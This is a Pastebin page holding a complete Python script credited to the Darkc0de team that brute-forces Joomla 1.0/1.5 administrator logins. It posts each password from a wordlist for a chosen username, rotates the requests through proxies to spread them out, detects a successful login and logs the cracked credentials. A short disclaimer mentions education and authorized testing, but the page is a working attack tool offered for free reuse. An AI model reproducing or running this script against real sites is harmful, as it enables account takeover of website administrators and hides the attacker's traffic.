API tools faq
paste
Advertisement
Jemb0t_IR3eng

Joomla Administrator Panel BruteForcer

Jemb0t_IR3eng
Mar 10th, 2017
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.44 KB | None | 0 0
raw download clone embed print report
  1. ###########################
  2.  
  3. # Joomla Administrator Panel BruteForcer
  4.  
  5. ###########################
  6.  
  7. #!/usr/bin/python
  8. # Joomla Administrator Login BruteForcer for v1.0 and v1.5
  9.  
  10. # Feel free to do whatever you want with this code!
  11. # Share the c0de!
  12.  
  13. # Darkc0de Team
  14. # www.darkc0de.com
  15. # rsauron[at]gmail[dot]com
  16.  
  17. # Greetz to
  18. # d3hydr8, P47r1ck, Tarsian, c0mrade, reverenddigitalx
  19. # and everyone at darkc0de
  20.  
  21. # This was written for educational purpose only. Use it at your own risk.
  22. # Author will be not responsible for any damage!
  23. # Intended for authorized Web Application Pen Testing!
  24.  
  25. # BE WARNED, THIS TOOL IS VERY LOUD..
  26.  
  27. import urllib, sys, re, os, socket, httplib, urllib2, time
  28.  
  29. #determine platform
  30. if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
  31. SysCls = 'clear'
  32. elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
  33. SysCls = 'cls'
  34. else:
  35. SysCls = 'unknown'
  36.  
  37. #say hello
  38. os.system(SysCls)
  39. if len(sys.argv) <= 1:
  40. print "\n|----------------------------------------------|"
  41. print "| rsauron[@]gmail[dot]com v1.0 |"
  42. print "| 7/2008 joomlabrute.py |"
  43. print "| - Joomla Administrator Panel BruteForcer |"
  44. print "| Usage: joomlabrute.py [options] |"
  45. print "| -h help darkc0de.com |"
  46. print "|----------------------------------------------|\n"
  47. sys.exit(1)
  48.  
  49. #define varablies
  50. site = ""
  51. dbt = "joomlabrutelog.txt"
  52. proxy = "None"
  53. arg_words = ""
  54. arg_user = "admin"
  55. arg_verbose = "None"
  56. count = 0
  57. gets = 0
  58.  
  59. #help option
  60. for arg in sys.argv:
  61. if arg == "-h":
  62. print "\n Usage: ./joomlabrute.py [options] rsauron[@]gmail[dot]com darkc0de.com"
  63. print "\n\tRequired:"
  64. print "\tDefine: -u www.site.com/administrator/"
  65. print "\tDefine: -w words.txt"
  66. print "\n\tOptional:"
  67. print "\tDefine: -user \"jorge\" Default:admin"
  68. print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
  69. print "\tDefine: -o \"ouput_file_name.txt\" Default:joomlabrutelog.txt"
  70. print "\tDefine: -v Verbose Mode"
  71. print "\n Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
  72. print " Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
  73. sys.exit(1)
  74.  
  75. #Check args
  76. for arg in sys.argv:
  77. if arg == "-u":
  78. site = sys.argv[count+1]
  79. elif arg == "-o":
  80. dbt = sys.argv[count+1]
  81. elif arg == "-p":
  82. proxy = sys.argv[count+1]
  83. elif arg == "-w":
  84. arg_words = sys.argv[count+1]
  85. elif arg == "-user":
  86. arg_user = sys.argv[count+1]
  87. elif arg == "-v":
  88. arg_verbose = sys.argv
  89. count+=1
  90.  
  91. #Title write
  92. file = open(dbt, "a")
  93. print "\n|----------------------------------------------|"
  94. print "| rsauron[@]gmail[dot]com v1.0 |"
  95. print "| 7/2008 joomlabrute.py |"
  96. print "| - Joomla Administrator Panel BruteForcer |"
  97. print "| Usage: joomlabrute.py [options] |"
  98. print "| -h help darkc0de.com |"
  99. print "|----------------------------------------------|"
  100. file.write("\n\n|----------------------------------------------|")
  101. file.write("\n| rsauron[@]gmail[dot]com v1.0 |")
  102. file.write("\n| 7/2008 joomlabrute.py |")
  103. file.write("\n| - Joomla Administrator Panel BruteForcer |")
  104. file.write("\n| Usage: joomlabrute.py [options] |")
  105. file.write("\n| -h help darkc0de.com |")
  106. file.write("\n|----------------------------------------------|\n")
  107.  
  108. #Arg Error Checking
  109. if site == "":
  110. print "[-] Must include -u flag."
  111. print "[-] For help -h\n"
  112. sys.exit(1)
  113. if arg_words == "":
  114. print "[-] Must include -w flag."
  115. print "[-] For help -h\n"
  116. sys.exit(1)
  117. if proxy != "None":
  118. if len(proxy.split(".")) == 2:
  119. proxy = open(proxy, "r").read()
  120. if proxy.endswith("\n"):
  121. proxy = proxy.rstrip("\n")
  122. proxy = proxy.split("\n")
  123. if site[:7] != "http://":
  124. site = "http://"+site
  125.  
  126. #Build proxy list
  127. socket.setdefaulttimeout(10)
  128. proxy_list = []
  129. if proxy != "None":
  130.  
  131. file.write("[+] Building Proxy List...")
  132. print "[+] Building Proxy List..."
  133. for p in proxy:
  134. try:
  135. proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
  136. opener = urllib2.build_opener(proxy_handler)
  137. opener.open("http://www.google.com")
  138. opener.addheaders = [('User-agent', 'Mozilla/5.0')]
  139. proxy_list.append(opener)
  140. file.write("\n\tProxy:"+p+"- Success")
  141. print "\tProxy:",p,"- Success"
  142. except:
  143. file.write("\n\tProxy:"+p+"- Failed")
  144. print "\tProxy:",p,"- Failed"
  145. pass
  146. if len(proxy_list) == 0:
  147. print "[-] All proxies have failed. App Exiting"
  148. file.write("\n[-] All proxies have failed. App Exiting\n")
  149. sys.exit(1)
  150. print "[+] Proxy List Complete"
  151. file.write("[+] Proxy List Complete")
  152. else:
  153. print "[-] Proxy Not Given"
  154. file.write("[+] Proxy Not Given")
  155. proxy_list.append(urllib2.build_opener())
  156. proxy_num = 0
  157. proxy_len = len(proxy_list)
  158.  
  159. #here we go
  160. print "[+] BruteForcing:",site
  161. print "[+] Username:",arg_user
  162. file.write("\n[+] BruteForcing:"+str(site))
  163. file.write("\n[+] Username:"+str(arg_user))
  164. try:
  165. words = open(arg_words, "r").readlines()
  166. print "[+] Words Loaded:",len(words)
  167. words_len = len(words)
  168. file.write("\n[+] Words Loaded: "+str(words_len))
  169. except(IOError):
  170. print "[-] Error: Check your wordlist path\n"
  171. sys.exit(1)
  172. print "[+] [%s]" % time.strftime("%X")
  173. file.write("\n[+] [%s]" % time.strftime("%X"))
  174. for word in words:
  175. word = word.replace("\r","").replace("\n","")
  176. login_form_seq = [
  177. ('usrname', arg_user),
  178. ('pass', word),
  179. ('submit', 'Login')]
  180. login_form_data = urllib.urlencode(login_form_seq)
  181. while 1:
  182. try:
  183. gets+=1
  184. proxy_num+=1
  185. site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
  186. break
  187. except (KeyboardInterrupt, SystemExit):
  188. raise
  189. except:
  190. pass
  191. #See where it says Username... change this to whatever your getting back on a incorrect login
  192. if re.search("Username",site_get) == None:
  193. print "\n\t[!] Login Successfull:",arg_user+":"+word
  194. file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
  195. break
  196. else:
  197. if arg_verbose != "None":
  198. print "[-] Login Failed:",word
  199. file.write("\n[-] Login Failed:"+str(word))
  200.  
  201. #Lets wrap it up!
  202. print "\n[-] [%s]" % time.strftime("%X")
  203. print "[-] Total URL Requests",gets
  204. file.write("\n\n[-] [%s]" % time.strftime("%X"))
  205. file.write("\n[-] Total URL Requests "+str(gets))
  206. print "[-] Done\n"
  207. file.write("\n[-] Done\n")
  208. print "Don't forget to check", dbt,"\n"
  209. file.close()
  210.  
  211.  
  212.  
  213. ###########################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!